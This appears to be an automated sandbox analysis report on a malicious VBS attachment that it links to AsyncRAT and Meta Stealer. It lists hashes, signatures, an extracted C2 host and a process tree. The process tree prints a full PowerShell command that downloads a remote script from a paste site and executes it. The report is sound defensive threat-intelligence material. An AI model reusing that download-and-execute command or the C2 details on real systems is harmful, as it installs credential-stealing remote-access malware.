Overview

overview

10

Static

static

116 Pax Ch...ls.vbs

windows7_x64

10

116 Pax Ch...ls.vbs

windows10_x64

10

Analysis

  • max time kernel
    80s
  • max time network
    612s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    14-04-2022 15:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    116 Pax Charter Details.vbs

  • Size

    57KB

  • MD5

    52d94e55aac61768976f39040c288eef

  • SHA1

    e942fa64351f106b614b28e86d3a42d50e5a0443

  • SHA256

    fcd18b069a963b01f447b35ac7f12421ac36f8c577a1f19880ea0258e0505747

  • SHA512

    fe278c9483992b979e356ec4380182d7519d47144cf3ed9c9caaf0346c4bcb788272562f57264ac7a3a35bf67e9e36ac19ec5d5a07d9564a99360de77b72b717

Score
10/10
asyncratmetastealerdefaultratstealersuricata

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://textbin.net/raw/x6lfwhnyrz

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

crazydns.linkpc.net:5900

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Meta Stealer Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

    stealermetastealer
  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

    suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

    suricata
  • Async RAT payload 4 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\116 Pax Charter Details.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:64
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/x6lfwhnyrz'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\x6lfwhnyrz.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1'
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1
        3⤵
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1828
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ttrfgfuw\ttrfgfuw.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD38.tmp" "c:\Users\Admin\AppData\Local\Temp\ttrfgfuw\CSCC1D4DB35A7DE4D4381D55A736C3DEC7A.TMP"
            5⤵
              PID:2744
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3148
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA42F.tmp.bat""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3188
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                6⤵
                • Delays execution with timeout.exe
                PID:1288

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      3fb7f9b6c8c061d1a91a99c05f205dbc

      SHA1

      b8956e5dfaa8b012fa1c21536acffb877fec37c8

      SHA256

      e41b989f4d22e01403729e5e5b2423ece983d7407e7409e0e6d350ee8bba9166

      SHA512

      f6b6dcb58956c8a90b0432d4e18797d8152aa182b621f5836f9dad1f100846c2c2c2085742a2c4ba414eeef1d528d98a2baae1e797d259cb2839ac427582ab4c

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\RESCD38.tmp
      Filesize

      1KB

      MD5

      1ca2f096b6b7bd6ee219a00ea4281a41

      SHA1

      478c14065a000c81611825b3c9eb7f0c891c0b4b

      SHA256

      c6f5c20fdcf1bf77ddf53e98958f3ecce9894d400ecb621fef485c2a5446512f

      SHA512

      a9d331f023c3520b37f7d29f8230773b206845627e154ae64cc1f7ac4ded08a2bb9716a093f70fceb21a19156fdd93eddc6ba4c50e3db7d3559ffbb259ef3ea4

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmpA42F.tmp.bat
      Filesize

      173B

      MD5

      3666e5cf6f2c1cc561e09805f8bf728b

      SHA1

      26c0b59b4c6ddcf4191eb9e9cc8bc4b1b967b25b

      SHA256

      f73f0a5bf054a72a51db03f3776bf74f665f6fec044a375e2461e0a58f3a54f3

      SHA512

      3b1bb8212791402a6ab3e4a4d177861ae01a14567e844f5fb3aed810101d19294788906e1418441c369664f39c0887993719b7069726818c9b09cc7bdd3114b1

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\ttrfgfuw\ttrfgfuw.dll
      Filesize

      11KB

      MD5

      12ab9b237bb49f00ecaf556f74c995c4

      SHA1

      837a7617d3a394a40da8eec4e79d1a78988e6ba3

      SHA256

      1c7af518be71b97778407d76c2845dffe553567de16f9c1e68cf97ebf8cf80d5

      SHA512

      e79c5545c187d7735bd94eb3242f521faaf74bdbd349601779cb47b7eb1b4f8c82e4e6297b2d54704ede93c55ec75d31fd07156ce5c0cb3d69f41de744e0347e

      Download Submit
    • C:\Users\Public\x6lfwhnyrz.PS1
      Filesize

      119KB

      MD5

      8a4c64e0dc47055ac4df009b38c5c442

      SHA1

      1cfade9c2531a2721261df5f323b918a96fe6db7

      SHA256

      8d6d23ec88918ca2a42e1f578fa0d353bc6c93a557c9cf77a0704964fd9c9f8e

      SHA512

      18911c1ee6c579b5a4ceb79b0b7fe77f4e2af500a0851cbca9c67f2f852517ff25f352820c30dcde0081a99752765ae5d6d77d68f0d80056ac194fff4ee565f9

      Download Submit
    • \??\c:\Users\Admin\AppData\Local\Temp\ttrfgfuw\CSCC1D4DB35A7DE4D4381D55A736C3DEC7A.TMP
      Filesize

      652B

      MD5

      44c446c277e8073520f6a5f0b13b9331

      SHA1

      5e4e22548ceb17ca019b11c637d6ec06c04f3b69

      SHA256

      8945a00cabe7127c754c49f2c974b7948f8721bf4adb17e69c8fc4d413d40886

      SHA512

      85506b438d5c6fc0b1dde291f7e17a69c7e05ee10ecb83b05c164d57164d1abd6c694cb19381fed5d865afbabcb43f61155c25aba98a57c1746596a1c9ce06fd

      Download Submit
    • \??\c:\Users\Admin\AppData\Local\Temp\ttrfgfuw\ttrfgfuw.0.cs
      Filesize

      14KB

      MD5

      5b28648a4e188b0ebdf2d5edcda61624

      SHA1

      faf0ba6c2ef8d8184881eda8a276796449969e1c

      SHA256

      e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1

      SHA512

      972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937

      Download Submit
    • \??\c:\Users\Admin\AppData\Local\Temp\ttrfgfuw\ttrfgfuw.cmdline
      Filesize

      327B

      MD5

      6e245703f24e0db1dd6b1e42da7a4962

      SHA1

      cdc61732bb6fef242ff5903917a38c96dba53bfc

      SHA256

      242588558957ef2b0bb35064f782ac8b4c45eb9d195b8f12e409933ec0fbb113

      SHA512

      d11eb333eacd5a5de0a13276a57ca07ea0defa5af3428990553b6a3448d865c7ba29c9024166193c241a39698e3d3e707351b5f4f0152d3e5294bb85270ef345

      Download Submit
    • memory/1288-271-0x0000000000000000-mapping.dmp
      Download
    • memory/1324-119-0x0000000000000000-mapping.dmp
      Download
    • memory/1324-139-0x00000214E1016000-0x00000214E1018000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1324-130-0x00000214E1CB0000-0x00000214E1D26000-memory.dmp
      Filesize

      472KB

      Download
    • memory/1324-129-0x00000214E1013000-0x00000214E1015000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1324-128-0x00000214E1010000-0x00000214E1012000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1324-124-0x00000214E11C0000-0x00000214E11E2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1828-149-0x000001F255FD0000-0x000001F255FD2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1828-222-0x000001F2582D0000-0x000001F2587F6000-memory.dmp
      Filesize

      5.1MB

      Download
    • memory/1828-140-0x0000000000000000-mapping.dmp
      Download
    • memory/1828-223-0x000001F255FD6000-0x000001F255FD8000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1828-231-0x000001F23DB40000-0x000001F23DB4A000-memory.dmp
      Filesize

      40KB

      Download
    • memory/1828-151-0x000001F255FD3000-0x000001F255FD5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2744-227-0x0000000000000000-mapping.dmp
      Download
    • memory/3148-245-0x0000000009B50000-0x000000000A04E000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/3148-244-0x00000000095B0000-0x000000000964C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/3148-233-0x000000000040CBCE-mapping.dmp
      Download
    • memory/3148-246-0x00000000096C0000-0x0000000009726000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3148-247-0x000000000A890000-0x000000000A906000-memory.dmp
      Filesize

      472KB

      Download
    • memory/3148-248-0x00000000095A0000-0x00000000095B0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3148-249-0x000000000A830000-0x000000000A84E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3148-250-0x000000000AAF0000-0x000000000AB82000-memory.dmp
      Filesize

      584KB

      Download
    • memory/3148-263-0x000000000AD10000-0x000000000AD74000-memory.dmp
      Filesize

      400KB

      Download
    • memory/3148-232-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/3188-266-0x0000000000000000-mapping.dmp
      Download
    • memory/3928-224-0x0000000000000000-mapping.dmp
      Download